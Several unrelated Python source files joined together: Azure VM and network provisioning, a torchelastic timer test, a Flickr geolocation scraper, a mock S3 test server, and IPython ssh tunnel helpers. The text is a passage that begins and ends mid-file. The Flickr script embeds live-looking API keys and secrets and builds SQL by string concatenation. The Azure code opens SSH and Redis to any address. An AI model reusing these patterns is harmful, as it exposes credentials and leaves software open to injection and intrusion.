self.subscription_id = os.environ["AZURE_SUBSCRIPTION_ID"]
resource_client = ResourceManagementClient(credential, self.subscription_id)
rg_result = resource_client.resource_groups.create_or_update(self.resource_group_name,
{
"location": location
}
)
print((("Provisioned resource group %s in the %s region") % (rg_result.name, rg_result.location)))
compute_client = ComputeManagementClient(credential, self.subscription_id)
network_client = NetworkManagementClient(credential, self.subscription_id)
self.initializeResourceGroup(network_client, location)
return compute_client, network_client
def cleanupAzure(self):
credential = AzureCliCredential()
self.subscription_id = os.environ["AZURE_SUBSCRIPTION_ID"]
resource_client = ResourceManagementClient(credential, self.subscription_id)
poller = resource_client.resource_groups.begin_delete(self.resource_group_name)
result = poller.result()
print((("Deleted resource group %s") % (self.resource_group_name)))
def initializeResourceGroup(self, network_client, location):
# Provision the virtual network and wait for completion
poller = network_client.virtual_networks.begin_create_or_update(self.resource_group_name,
self.vnet_name,
{
"location": location,
"address_space": {
"address_prefixes": ["10.0.0.0/16"]
}
}
)
vnet_result = poller.result()
with print_lock:
print("Provisioned virtual network %s with address prefixes %s" % (vnet_result.name, vnet_result.address_space.address_prefixes))
# Step 3: Provision the subnet and wait for completion
poller = network_client.subnets.begin_create_or_update(self.resource_group_name,
self.vnet_name, self.subnet_name,
{ "address_prefix": "10.0.0.0/24" }
)
self.subnet_result = poller.result()
with print_lock:
print("Provisioned virtual subnet %s with address prefix %s" % (self.subnet_result.name, self.subnet_result.address_prefix))
poller = network_client.network_security_groups.begin_create_or_update(self.resource_group_name,
self.sec_group_name,
{
"location": location,
"security_rules": [
{
"name": "ssh",
"properties": {
"Protocol": "Tcp",
"Description": "allow SSH",
"SourceAddressPrefix": "*",
"SourcePortRange": "*",
"DestinationPortRange": "22",
"Priority": 100,
"DestinationAddressPrefix": "*",
"Access": "Allow",
"Direction": "Inbound",
}
},
{
"name": "application",
"properties": {
"Protocol": "Tcp",
"Description": "allow application",
"SourceAddressPrefix": "*",
"SourcePortRange": "*",
"DestinationPortRange": "12345",
"Priority": 101,
"DestinationAddressPrefix": "*",
"Access": "Allow",
"Direction": "Inbound",
}
},
{
"name": "application2",
"properties": {
"Protocol": "Tcp",
"Description": "allow application",
"SourceAddressPrefix": "*",
"SourcePortRange": "*",
"DestinationPortRange": "12346",
"Priority": 102,
"DestinationAddressPrefix": "*",
"Access": "Allow",
"Direction": "Inbound",
}
},
{
"name": "redis-clients",
"properties": {
"Protocol": "Tcp",
"Description": "allow application",
"SourceAddressPrefix": "*",
"SourcePortRange": "*",
"DestinationPortRange": "6379",
"Priority": 103,
"DestinationAddressPrefix": "*",
"Access": "Allow",
"Direction": "Inbound",
}
},
{
"name": "redis-cluster-bus",
"properties": {
"Protocol": "Tcp",
"Description": "allow application",
"SourceAddressPrefix": "*",
"SourcePortRange": "*",
"DestinationPortRange": "16379",
"Priority": 104,
"DestinationAddressPrefix": "*",
"Access": "Allow",
"Direction": "Inbound",
}
}
]
}
)
self.sec_group_result = poller.result()
def startAzureInstance(self, compute_client, network_client, name, instance_type, location, image_path, ssh_key_data, pbar):
ip_name = self.ip_name + "_" + name
ip_config_name = self.ip_config_name + "_" + name
nic_name = self.nic_name + "_" + name
vm_name = self.name + "_" + name
vm_name = vm_name.replace("_", "-") # azure gets mad if the name has _ in it
# Step 4: Provision an IP address and wait for completion
with azure_cli_lock:
poller = network_client.public_ip_addresses.begin_create_or_update(self.resource_group_name,
ip_name,
{
"location": location,
"sku": { "name": "Standard" },
"public_ip_allocation_method": "Static",
"public_ip_address_version" : "IPV4"
}
)
ip_address_result = poller.result()
with pbar_lock:
pbar.update(1)
with print_lock:
tqdm.write("Provisioned public IP address %s with address %s" % (ip_address_result.name, ip_address_result.ip_address))
#security_rule = SecurityRule(protocol='Tcp', source_address_prefix='Internet',
# source_port_range="*", destination_port_range="22", priority=100,
# destination_address_prefix='*', access='Allow', direction='Inbound')
#nsg_params = NetworkSecurityGroup(id=sec_group_name, location=location, security_rules=[security_rule])
# Step 5: Provision the network interface client
with azure_cli_lock:
poller = network_client.network_interfaces.begin_create_or_update(self.resource_group_name,
nic_name,
{
"location": location,
"ip_configurations": [ {
"name": ip_config_name,
"subnet": { "id": self.subnet_result.id },
"public_ip_address": {"id": ip_address_result.id }
}],
"network_security_group": {
"id": self.sec_group_result.id
}
}
)
nic_result = poller.result()
with pbar_lock:
pbar.update(1)
with print_lock:
tqdm.write("Provisioned network interface client %s" % (nic_result.name))
#print((("Provisioning virtual machine %s; this operation might take a few minutes.") % (vm_name)))
with azure_cli_lock:
poller = compute_client.virtual_machines.begin_create_or_update(self.resource_group_name, vm_name,
{
"location": location,
"storage_profile": {
"image_reference": {
"id": "/subscriptions/{}/{}".format(self.subscription_id, image_path),
}
},
"hardware_profile": {
"vm_size": instance_type
},
"os_profile": {
"computer_name": vm_name,
"admin_username": USERNAME,
"linux_configuration": {
"disablePasswordAuthentication": True,
"ssh": {
"public_keys": [{
"path": "/home/{}/.ssh/authorized_keys".format(USERNAME),
"key_data": ssh_key_data
}]
}
}
},
"network_profile": {
"network_interfaces": [{
"id": nic_result.id,
}]
}
})
#vm_result = poller.result()
with pbar_lock:
pbar.update(1)
with print_lock:
tqdm.write("Began provisioning virtual machine %s" % (vm_name))
return poller, ip_address_result.ip_address, nic_result.ip_configurations[0].private_ip_address
    def startAzureInstances(self, compute_client, network_client, name_prefix, instance_type, location, image_path, ssh_key_data, num, pbar):
vm_list = []
ip_list = []
private_ip_list = []
for i in range(num):
name = name_prefix + str(i)
vm_poller, ip, private_ip = self.startAzureInstance(compute_client, network_client, name, instance_type, location, image_path, ssh_key_data, pbar)
vm_list.append(vm_poller)
ip_list.append(ip)
private_ip_list.append(private_ip)
for i in range(num):
vm_list[i].result()
print((("Provisioned virtual machine %s") % name))
return vm_list, ip_list, private_ip_list
def startAzureInstancesAsync(self, compute_client, network_client, name_prefix, instance_type, location, image_path, ssh_key_data, num, result_queue, pbar):
threads = []
def startInstance(name):
result_queue.put(self.startAzureInstance(compute_client, network_client, name, instance_type, location, image_path, ssh_key_data, pbar))
for i in range(num):
name = name_prefix + str(i)
t = threading.Thread(target=startInstance, args=(name,))
t.start()
threads.append(t)
return threads
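    # Hedged usage sketch (hypothetical driver code and sizes, not part of this
    # module): start the VMs in background threads, wait for the workers, then
    # drain the result queue of (poller, public_ip, private_ip) tuples.
    #
    #     q = queue.Queue()
    #     workers = setup.startAzureInstancesAsync(compute_client, network_client,
    #                                              "node", sgx_4_core, LOCATION,
    #                                              image_path, ssh_key_data, 4, q, pbar)
    #     for t in workers:
    #         t.join()
    #     results = [q.get() for _ in range(4)]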
def terminateAzureInstance(self, client, vm):
client.virtual_machines.deallocate(self.resource_group_name, vm.name)
print((("Terminated virtual machine %s") % (vm.name)))
def terminateAzureInstances(self, client, vm_list):
for vm in vm_list:
            self.terminateAzureInstance(client, vm)
print("Terminated all instances")
|
local_timer_example.py
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
import logging
import multiprocessing as mp
import signal
import time
import unittest
import torch.multiprocessing as torch_mp
import torchelastic.timer as timer
from test_utils import is_asan_or_tsan, is_tsan
logging.basicConfig(
level=logging.INFO, format="[%(levelname)s] %(asctime)s %(module)s: %(message)s"
)
def _happy_function(rank, mp_queue):
timer.configure(timer.LocalTimerClient(mp_queue))
with timer.expires(after=1):
time.sleep(0.5)
def _stuck_function(rank, mp_queue):
timer.configure(timer.LocalTimerClient(mp_queue))
with timer.expires(after=1):
time.sleep(5)
class LocalTimerExample(unittest.TestCase):
"""
Demonstrates how to use LocalTimerServer and LocalTimerClient
to enforce expiration of code-blocks.
Since torch multiprocessing's ``start_process`` method currently
does not take the multiprocessing context as parameter argument
there is no way to create the mp.Queue in the correct
context BEFORE spawning child processes. Once the ``start_process``
API is changed in torch, then re-enable ``test_torch_mp_example``
unittest. As of now this will SIGSEGV.
"""
@unittest.skipIf(is_asan_or_tsan(), "test is a/tsan incompatible")
def test_torch_mp_example(self):
# in practice set the max_interval to a larger value (e.g. 60 seconds)
mp_queue = mp.get_context("spawn").Queue()
server = timer.LocalTimerServer(mp_queue, max_interval=0.01)
server.start()
world_size = 8
# all processes should complete successfully
# since start_process does NOT take context as parameter argument yet
# this method WILL FAIL (hence the test is disabled)
torch_mp.spawn(
fn=_happy_function, args=(mp_queue,), nprocs=world_size, join=True
)
with self.assertRaises(Exception):
# torch.multiprocessing.spawn kills all sub-procs
# if one of them gets killed
torch_mp.spawn(
fn=_stuck_function, args=(mp_queue,), nprocs=world_size, join=True
)
server.stop()
@unittest.skipIf(is_asan_or_tsan(), "test is a/tsan incompatible")
def test_example_start_method_spawn(self):
self._run_example_with(start_method="spawn")
@unittest.skipIf(is_asan_or_tsan(), "test is a/tsan incompatible")
def test_example_start_method_forkserver(self):
self._run_example_with(start_method="forkserver")
@unittest.skipIf(is_tsan(), "test is tsan incompatible")
def test_example_start_method_fork(self):
self._run_example_with(start_method="fork")
def _run_example_with(self, start_method):
spawn_ctx = mp.get_context(start_method)
mp_queue = spawn_ctx.Queue()
server = timer.LocalTimerServer(mp_queue, max_interval=0.01)
server.start()
world_size = 8
processes = []
for i in range(0, world_size):
if i % 2 == 0:
p = spawn_ctx.Process(target=_stuck_function, args=(i, mp_queue))
else:
p = spawn_ctx.Process(target=_happy_function, args=(i, mp_queue))
p.start()
processes.append(p)
for i in range(0, world_size):
p = processes[i]
p.join()
if i % 2 == 0:
self.assertEqual(-signal.SIGKILL, p.exitcode)
else:
self.assertEqual(0, p.exitcode)
server.stop()
|
get_photo_info.py
|
import flickrapi
import psycopg2
import threading
import traceback
from ast import literal_eval
import json
def data_walker(method, searchstring='*/photo', **params):
"""Calls 'method' with page=0, page=1 etc. until the total
number of pages has been visited. Yields the photos
returned.
Assumes that ``method(page=n, **params).findall(searchstring)``
results in a list of interesting elements (defaulting to photos),
and that the toplevel element of the result contains a 'pages'
attribute with the total number of pages.
"""
page = 1
total = 1 # We don't know that yet, update when needed
while page <= total:
# Fetch a single page of photos
# LOG.debug('Calling %s(page=%i of %i, %s)' %
# (method.func_name, page, total, params))
rsp = method(page=page, **params)
photoset = rsp.getchildren()[0]
total = int(photoset.get('pages'))
photos = rsp.findall(searchstring)
# Yield each photo
for photo in photos:
yield photo
# Ready to get the next page
page += 1
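# Hedged usage sketch (hypothetical credentials and user id; assumes a FlickrAPI
# client returning ElementTree responses, which data_walker expects):
#
#     flickr = flickrapi.FlickrAPI(api_key, api_secret)
#     for photo in data_walker(flickr.people.getPublicPhotos,
#                              user_id='12345678@N00', per_page=500):
#         print photo.get('id')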
def addslashes(s):
d = {'"':'\\"', "'":"''", "\0":"\\\0", "\\":"\\\\"}
return ''.join(d.get(c, c) for c in s)
def get_image_loc(api_key,api_secret,record,out_file):
# try:
# conn = psycopg2.connect("dbname='flickr2' user='postgres' host='129.219.60.22' password='password'")
# print "Successfully connected...."
# except:
# pass
# cur = conn.cursor()
flickr = flickrapi.FlickrAPI(api_key, api_secret,format='json')
# out_file = open("lat_long_train2.txt", 'w')
# out_file.write("test")
photoid,_ = literal_eval(record)
# photoid = '34186307736'
# photoid = record[0]
# userid = '62202285@N00'
try:
# image_metadata = data_walker(flickr.photos.geo.getLocation,searchstring=,
# per_page=1000, photo_id= photoid)
image_metadata = flickr.photos.geo.getLocation(photo_id=photoid,format='json')
"""
<photo id="32948082713" owner="62202285@N00" secret="1aaa122f05" server="3940" farm="4" title="Fleurs sauvages...!!!" ispublic="1" isfriend="0" isfamily="0" />
"""
image_metadata = json.loads(image_metadata)
latitude = image_metadata['photo']['location']['latitude']
longitude = image_metadata['photo']['location']['longitude']
neighbourhood = image_metadata['photo']['location']['neighbourhood']['_content']
locality = image_metadata['photo']['location']['locality']['_content']
county = image_metadata['photo']['location']['county']['_content']
region = image_metadata['photo']['location']['region']['_content']
country = image_metadata['photo']['location']['country']['_content']
# print image_metadata['photo']['location']['county']['_content']
st = "Insert into image_loc_info2 (photo_id,latitude,longitude,neighbourhood,locality,county,region,country) values "\
+ "('"+photoid+"',"\
+latitude+","\
+longitude+",'"\
+addslashes(neighbourhood)+"','"\
+addslashes(locality)+"','" \
+ addslashes(county) + "','" \
+addslashes(region)+"','"\
+addslashes(country)+"')"
print st
tup = (photoid,latitude,longitude)
out_file.write(str(tup) + "\n")
# try:
# cur.execute(st)
# except:
# traceback.print_exc()
# pass
# print tup > out_file
except:
# traceback.print_exc()
print "location not found!! ",photoid
# conn.close()
def main():
count = 0
api_keys = [u'50447f832b7d99785ebb9ba9b69e6a65',u'82764a924643a98e49381f5f28a9a5a7',u'36eadd83335122d888da119424854efc',u'51da9f4ccbd1dae169eb1e619690530e',u'5ebfd342ebab8ea6b16fbbfe6daf632e']
api_secrets = [u'11d5ef95815b96b0',u'39c68f2dd019d2c0',u'2bbc80b7476185c5',u'5c473c8f547f07d6',u'1e9c1b2440923add']
# api_key = u'50447f832b7d99785ebb9ba9b69e6a65'
# api_secret = u'11d5ef95815b96b0'
import csv
fil = open('new_photo_ids_test_100.txt', 'r')
records = fil.readlines()
# records = records[1:]
out_file = open('lat_long_mt_test.txt','a')
num_threads = 10
threads = []
while count < len(records):
if threading.active_count() <= num_threads:
print count
# print "Number of threads: ",threading.active_count()
t = threading.Thread(target=get_image_loc,args=(api_keys[count%5],api_secrets[count%5],records[count],out_file))
threads.append(t)
t.start()
count += 1
# for x in threads:
# if threading.active_count() <= num_threads:
# x.start()
# Wait for all of them to finish
for x in threads:
x.join()
out_file.close()
# get_image_loc(api_keys[count%5],api_secrets[count%5],records)
if __name__ == '__main__':
main()
|
server.py
|
try:
from BaseHTTPServer import BaseHTTPRequestHandler
except ImportError:
from http.server import BaseHTTPRequestHandler
try:
from BaseHTTPServer import HTTPServer
except ImportError:
from http.server import HTTPServer
try:
import urllib.parse as urlparse
except ImportError:
import urlparse
import json
import logging
import os
import socket
import sys
import threading
import time
import uuid
import xml.etree.ElementTree
BASE_DIR = os.path.dirname(__file__)
logging.getLogger().setLevel(logging.INFO)
file_handler = logging.FileHandler(os.path.join(BASE_DIR, "test-server.log"), "a", encoding="utf-8")
file_handler.setFormatter(logging.Formatter("%(asctime)s %(message)s"))
logging.getLogger().addHandler(file_handler)
logging.getLogger().addHandler(logging.StreamHandler())
communication_port = int(sys.argv[1])
bucket = sys.argv[2]
def GetFreeTCPPortsAndIP(n):
result = []
sockets = []
for i in range(n):
tcp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tcp.bind((socket.gethostname(), 0))
addr, port = tcp.getsockname()
result.append(port)
sockets.append(tcp)
[ s.close() for s in sockets ]
return result, addr
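# Note: binding to port 0 makes the OS pick a free port; the sockets are closed
# only after all picks are made, so the returned ports are distinct, but they
# are not reserved once closed and could in principle be taken by another
# process before the handlers below bind to them.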
(
redirecting_to_http_port,
simple_server_port,
preserving_data_port,
multipart_preserving_data_port,
redirecting_preserving_data_port
), localhost = GetFreeTCPPortsAndIP(5)
data = {
"redirecting_to_http_port": redirecting_to_http_port,
"preserving_data_port": preserving_data_port,
"multipart_preserving_data_port": multipart_preserving_data_port,
"redirecting_preserving_data_port": redirecting_preserving_data_port,
}
class SimpleHTTPServerHandler(BaseHTTPRequestHandler):
def do_GET(self):
logging.info("GET {}".format(self.path))
if self.path == "/milovidov/test.csv":
self.send_response(200)
self.send_header("Content-type", "text/plain")
self.end_headers()
data["redirect_csv_data"] = [[42, 87, 44], [55, 33, 81], [1, 0, 9]]
self.wfile.write("".join([ "{},{},{}\n".format(*row) for row in data["redirect_csv_data"]]))
else:
self.send_response(404)
self.end_headers()
self.finish()
class RedirectingToHTTPHandler(BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(307)
self.send_header("Content-type", "text/xml")
self.send_header("Location", "http://{}:{}/milovidov/test.csv".format(localhost, simple_server_port))
self.end_headers()
self.wfile.write(r"""<?xml version="1.0" encoding="UTF-8"?>
<Error>
<Code>TemporaryRedirect</Code>
<Message>Please re-send this request to the specified temporary endpoint.
Continue to use the original request endpoint for future requests.</Message>
<Endpoint>storage.yandexcloud.net</Endpoint>
</Error>""".encode())
self.finish()
class PreservingDataHandler(BaseHTTPRequestHandler):
protocol_version = "HTTP/1.1"
def parse_request(self):
result = BaseHTTPRequestHandler.parse_request(self)
# Adaptation to Python 3.
if sys.version_info.major == 2 and result == True:
expect = self.headers.get("Expect", "")
if (expect.lower() == "100-continue" and self.protocol_version >= "HTTP/1.1" and self.request_version >= "HTTP/1.1"):
if not self.handle_expect_100():
return False
return result
def send_response_only(self, code, message=None):
if message is None:
if code in self.responses:
message = self.responses[code][0]
else:
message = ""
if self.request_version != "HTTP/0.9":
self.wfile.write("%s %d %s\r\n" % (self.protocol_version, code, message))
def handle_expect_100(self):
logging.info("Received Expect-100")
self.send_response_only(100)
self.end_headers()
return True
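    # Clients that send "Expect: 100-continue" wait for this interim 100 response
    # before transmitting the request body, so do_PUT/do_POST below can then read
    # the body from rfile as usual.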
def do_POST(self):
self.send_response(200)
query = urlparse.urlparse(self.path).query
logging.info("PreservingDataHandler POST ?" + query)
if query == "uploads":
post_data = r"""<?xml version="1.0" encoding="UTF-8"?>
<hi><UploadId>TEST</UploadId></hi>""".encode()
self.send_header("Content-length", str(len(post_data)))
self.send_header("Content-type", "text/plain")
self.end_headers()
self.wfile.write(post_data)
else:
post_data = self.rfile.read(int(self.headers.get("Content-Length")))
self.send_header("Content-type", "text/plain")
self.end_headers()
data["received_data_completed"] = True
data["finalize_data"] = post_data
data["finalize_data_query"] = query
self.finish()
def do_PUT(self):
self.send_response(200)
self.send_header("Content-type", "text/plain")
self.send_header("ETag", "hello-etag")
self.end_headers()
query = urlparse.urlparse(self.path).query
path = urlparse.urlparse(self.path).path
logging.info("Content-Length = " + self.headers.get("Content-Length"))
logging.info("PUT " + query)
assert self.headers.get("Content-Length")
assert self.headers["Expect"] == "100-continue"
put_data = self.rfile.read()
data.setdefault("received_data", []).append(put_data)
logging.info("PUT to {}".format(path))
self.server.storage[path] = put_data
self.finish()
def do_GET(self):
path = urlparse.urlparse(self.path).path
if path in self.server.storage:
self.send_response(200)
self.send_header("Content-type", "text/plain")
self.send_header("Content-length", str(len(self.server.storage[path])))
self.end_headers()
self.wfile.write(self.server.storage[path])
else:
self.send_response(404)
self.end_headers()
self.finish()
class MultipartPreservingDataHandler(BaseHTTPRequestHandler):
protocol_version = "HTTP/1.1"
def parse_request(self):
result = BaseHTTPRequestHandler.parse_request(self)
# Adaptation to Python 3.
if sys.version_info.major == 2 and result == True:
expect = self.headers.get("Expect", "")
if (expect.lower() == "100-continue" and self.protocol_version >= "HTTP/1.1" and self.request_version >= "HTTP/1.1"):
if not self.handle_expect_100():
return False
return result
def send_response_only(self, code, message=None):
if message is None:
if code in self.responses:
message = self.responses[code][0]
else:
message = ""
if self.request_version != "HTTP/0.9":
self.wfile.write("%s %d %s\r\n" % (self.protocol_version, code, message))
def handle_expect_100(self):
logging.info("Received Expect-100")
self.send_response_only(100)
self.end_headers()
return True
def do_POST(self):
query = urlparse.urlparse(self.path).query
logging.info("MultipartPreservingDataHandler POST ?" + query)
if query == "uploads":
self.send_response(200)
post_data = r"""<?xml version="1.0" encoding="UTF-8"?>
<hi><UploadId>TEST</UploadId></hi>""".encode()
self.send_header("Content-length", str(len(post_data)))
self.send_header("Content-type", "text/plain")
self.end_headers()
self.wfile.write(post_data)
else:
try:
assert query == "uploadId=TEST"
logging.info("Content-Length = " + self.headers.get("Content-Length"))
post_data = self.rfile.read(int(self.headers.get("Content-Length")))
root = xml.etree.ElementTree.fromstring(post_data)
assert root.tag == "CompleteMultipartUpload"
assert len(root) > 1
content = ""
for i, part in enumerate(root):
assert part.tag == "Part"
assert len(part) == 2
assert part[0].tag == "PartNumber"
assert part[1].tag == "ETag"
assert int(part[0].text) == i + 1
content += self.server.storage["@"+part[1].text]
data.setdefault("multipart_received_data", []).append(content)
data["multipart_parts"] = len(root)
self.send_response(200)
self.send_header("Content-type", "text/plain")
self.end_headers()
logging.info("Sending 200")
            except Exception:
                logging.exception("Sending 500")
                self.send_response(500)
                self.end_headers()
self.finish()
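    # The completion body parsed above follows the S3 CompleteMultipartUpload
    # shape (illustrative sketch, not a verbatim client payload):
    #   <CompleteMultipartUpload>
    #     <Part><PartNumber>1</PartNumber><ETag>...</ETag></Part>
    #     <Part><PartNumber>2</PartNumber><ETag>...</ETag></Part>
    #   </CompleteMultipartUpload>
    # Each ETag must match one previously returned by do_PUT below, which is how
    # the parts are stitched back together from self.server.storage.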
def do_PUT(self):
uid = uuid.uuid4()
self.send_response(200)
self.send_header("Content-type", "text/plain")
self.send_header("ETag", str(uid))
self.end_headers()
query = urlparse.urlparse(self.path).query
path = urlparse.urlparse(self.path).path
logging.info("Content-Length = " + self.headers.get("Content-Length"))
logging.info("PUT " + query)
assert self.headers.get("Content-Length")
assert self.headers["Expect"] == "100-continue"
put_data = self.rfile.read()
data.setdefault("received_data", []).append(put_data)
logging.info("PUT to {}".format(path))
self.server.storage["@"+str(uid)] = put_data
self.finish()
def do_GET(self):
path = urlparse.urlparse(self.path).path
if path in self.server.storage:
self.send_response(200)
self.send_header("Content-type", "text/plain")
self.send_header("Content-length", str(len(self.server.storage[path])))
self.end_headers()
self.wfile.write(self.server.storage[path])
else:
self.send_response(404)
self.end_headers()
self.finish()
class RedirectingPreservingDataHandler(BaseHTTPRequestHandler):
protocol_version = "HTTP/1.1"
def parse_request(self):
result = BaseHTTPRequestHandler.parse_request(self)
# Adaptation to Python 3.
if sys.version_info.major == 2 and result == True:
expect = self.headers.get("Expect", "")
if (expect.lower() == "100-continue" and self.protocol_version >= "HTTP/1.1" and self.request_version >= "HTTP/1.1"):
if not self.handle_expect_100():
return False
return result
def send_response_only(self, code, message=None):
if message is None:
if code in self.responses:
message = self.responses[code][0]
else:
message = ""
if self.request_version != "HTTP/0.9":
self.wfile.write("%s %d %s\r\n" % (self.protocol_version, code, message))
def handle_expect_100(self):
logging.info("Received Expect-100")
return True
def do_POST(self):
query = urlparse.urlparse(self.path).query
if query:
query = "?{}".format(query)
self.send_response(307)
self.send_header("Content-type", "text/xml")
self.send_header("Location", "http://{host}:{port}/{bucket}/test.csv{query}".format(host=localhost, port=preserving_data_port, bucket=bucket, query=query))
self.end_headers()
self.wfile.write(r"""<?xml version="1.0" encoding="UTF-8"?>
<Error>
<Code>TemporaryRedirect</Code>
<Message>Please re-send this request to the specified temporary endpoint.
Continue to use the original request endpoint for future requests.</Message>
<Endpoint>{host}:{port}</Endpoint>
</Error>""".format(host=localhost, port=preserving_data_port).encode())
self.finish()
def do_PUT(self):
query = urlparse.urlparse(self.path).query
if query:
query = "?{}".format(query)
self.send_response(307)
self.send_header("Content-type", "text/xml")
self.send_header("Location", "http://{host}:{port}/{bucket}/test.csv{query}".format(host=localhost, port=preserving_data_port, bucket=bucket, query=query))
self.end_headers()
self.wfile.write(r"""<?xml version="1.0" encoding="UTF-8"?>
<Error>
<Code>TemporaryRedirect</Code>
<Message>Please re-send this request to the specified temporary endpoint.
Continue to use the original request endpoint for future requests.</Message>
<Endpoint>{host}:{port}</Endpoint>
</Error>""".format(host=localhost, port=preserving_data_port).encode())
self.finish()
class CommunicationServerHandler(BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(200)
self.end_headers()
        self.wfile.write(json.dumps(data).encode())
self.finish()
def do_PUT(self):
self.send_response(200)
self.end_headers()
logging.info(self.rfile.read())
self.finish()
servers = []
servers.append(HTTPServer((localhost, communication_port), CommunicationServerHandler))
servers.append(HTTPServer((localhost, redirecting_to_http_port), RedirectingToHTTPHandler))
servers.append(HTTPServer((localhost, preserving_data_port), PreservingDataHandler))
servers[-1].storage = {}
servers.append(HTTPServer((localhost, multipart_preserving_data_port), MultipartPreservingDataHandler))
servers[-1].storage = {}
servers.append(HTTPServer((localhost, simple_server_port), SimpleHTTPServerHandler))
servers.append(HTTPServer((localhost, redirecting_preserving_data_port), RedirectingPreservingDataHandler))
jobs = [ threading.Thread(target=server.serve_forever) for server in servers ]
[ job.start() for job in jobs ]
time.sleep(60) # Timeout
logging.info("Shutting down")
[ server.shutdown() for server in servers ]
logging.info("Joining threads")
[ job.join() for job in jobs ]
logging.info("Done")
|
tunnel.py
|
"""Basic ssh tunnel utilities, and convenience functions for tunneling
zeromq connections.
Authors
-------
* Min RK
"""
#-----------------------------------------------------------------------------
# Copyright (C) 2010-2011 The IPython Development Team
#
# Distributed under the terms of the BSD License. The full license is in
# the file COPYING, distributed as part of this software.
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
from __future__ import print_function
import os,sys, atexit
import signal
import socket
from multiprocessing import Process
from getpass import getpass, getuser
import warnings
try:
with warnings.catch_warnings():
warnings.simplefilter('ignore', DeprecationWarning)
import paramiko
except ImportError:
paramiko = None
else:
from .forward import forward_tunnel
try:
from IPython.external import pexpect
except ImportError:
pexpect = None
#-----------------------------------------------------------------------------
# Code
#-----------------------------------------------------------------------------
# select_random_ports copied from IPython.parallel.util
_random_ports = set()
def select_random_ports(n):
"""Selects and return n random ports that are available."""
ports = []
    for i in range(n):
sock = socket.socket()
sock.bind(('', 0))
while sock.getsockname()[1] in _random_ports:
sock.close()
sock = socket.socket()
sock.bind(('', 0))
ports.append(sock)
for i, sock in enumerate(ports):
port = sock.getsockname()[1]
sock.close()
ports[i] = port
_random_ports.add(port)
return ports
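# Illustrative use (not executed here): reserve two ephemeral ports for a tunnel.
#   lport, monitor_port = select_random_ports(2)
# The sockets are closed again before the ports are returned, so callers should
# bind them promptly; _random_ports only guards against reuse within this process.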
#-----------------------------------------------------------------------------
# Check for passwordless login
#-----------------------------------------------------------------------------
def try_passwordless_ssh(server, keyfile, paramiko=None):
"""Attempt to make an ssh connection without a password.
This is mainly used for requiring password input only once
when many tunnels may be connected to the same server.
If paramiko is None, the default for the platform is chosen.
"""
if paramiko is None:
paramiko = sys.platform == 'win32'
if not paramiko:
f = _try_passwordless_openssh
else:
f = _try_passwordless_paramiko
return f(server, keyfile)
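# Sketch of typical use before opening several tunnels to one host (the server
# string and key path below are made up for illustration):
#   if not try_passwordless_ssh('user@gateway.example.com', '~/.ssh/id_rsa'):
#       password = getpass("ssh password: ")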
def _try_passwordless_openssh(server, keyfile):
"""Try passwordless login with shell ssh command."""
if pexpect is None:
raise ImportError("pexpect unavailable, use paramiko")
cmd = 'ssh -f '+ server
if keyfile:
cmd += ' -i ' + keyfile
cmd += ' exit'
p = pexpect.spawn(cmd)
while True:
try:
p.expect('[Pp]assword:', timeout=.1)
except pexpect.TIMEOUT:
continue
except pexpect.EOF:
return True
else:
return False
def _try_passwordless_paramiko(server, keyfile):
"""Try passwordless login with paramiko."""
if paramiko is None:
msg = "Paramiko unavaliable, "
if sys.platform == 'win32':
msg += "Paramiko is required for ssh tunneled connections on Windows."
else:
msg += "use OpenSSH."
raise ImportError(msg)
username, server, port = _split_server(server)
client = paramiko.SSHClient()
client.load_system_host_keys()
client.set_missing_host_key_policy(paramiko.WarningPolicy())
try:
client.connect(server, port, username=username, key_filename=keyfile,
look_for_keys=True)
except paramiko.AuthenticationException:
return False
else:
client.close()
return True
def tunnel_connection(socket, addr, server, keyfile=None, password=None, paramiko=None, timeout=60):
"""Connect a socket to an address via an ssh tunnel.
This is a wrapper for socket.connect(addr), when addr is not accessible
from the local machine. It simply creates an ssh tunnel using the remaining args,
and calls socket.connect('tcp://localhost:lport') where lport is the randomly
selected local port of the tunnel.
"""
new_url, tunnel = open_tunnel(addr, server, keyfile=keyfile, password=password, paramiko=paramiko, timeout=timeout)
socket.connect(new_url)
return tunnel
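# Sketch of typical use with pyzmq (assumes a zmq context; illustrative only):
#   import zmq
#   ctx = zmq.Context.instance()
#   sock = ctx.socket(zmq.REQ)
#   tunnel_connection(sock, 'tcp://10.0.0.5:5555', 'user@gateway.example.com')
# The socket ends up connected to tcp://127.0.0.1:<lport>, which the ssh tunnel
# forwards to 10.0.0.5:5555 as seen from the gateway host.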
def open_tunnel(addr, server, keyfile=None, password=None, paramiko=None, timeout=60):
"""Open a tunneled connection from a 0MQ url.
For use inside tunnel_connection.
Returns
-------
(url, tunnel): The 0MQ url that has been forwarded, and the tunnel object
"""
lport = select_random_ports(1)[0]
transport, addr = addr.split('://')
ip,rport = addr.split(':')
rport = int(rport)
if paramiko is None:
paramiko = sys.platform == 'win32'
if paramiko:
tunnelf = paramiko_tunnel
else:
tunnelf = openssh_tunnel
tunnel = tunnelf(lport, rport, server, remoteip=ip, keyfile=keyfile, password=password, timeout=timeout)
return 'tcp://127.0.0.1:%i'%lport, tunnel
def openssh_tunnel(lport, rport, server, remoteip='127.0.0.1', keyfile=None, password=None, timeout=60):
"""Create an ssh tunnel using command-line ssh that connects port lport
on this machine to localhost:rport on server. The tunnel
will automatically close when not in use, remaining open
for a minimum of timeout seconds for an initial connection.
This creates a tunnel redirecting `localhost:lport` to `remoteip:rport`,
as seen from `server`.
keyfile and password may be specified, but ssh config is checked for defaults.
Parameters
----------
lport : int
local port for connecting to the tunnel from this machine.
rport : int
port on the remote machine to connect to.
server : str
The ssh server to connect to. The full ssh server string will be parsed.
user@server:port
remoteip : str [Default: 127.0.0.1]
The remote ip, specifying the destination of the tunnel.
Default is localhost, which means that the tunnel would redirect
localhost:lport on this machine to localhost:rport on the *server*.
keyfile : str; path to public key file
This specifies a key to be used in ssh login, default None.
Regular default ssh keys will be used without specifying this argument.
password : str;
Your ssh password to the ssh server. Note that if this is left None,
you will be prompted for it if passwordless key based login is unavailable.
timeout : int [default: 60]
The time (in seconds) after which no activity will result in the tunnel
closing. This prevents orphaned tunnels from running forever.
"""
if pexpect is None:
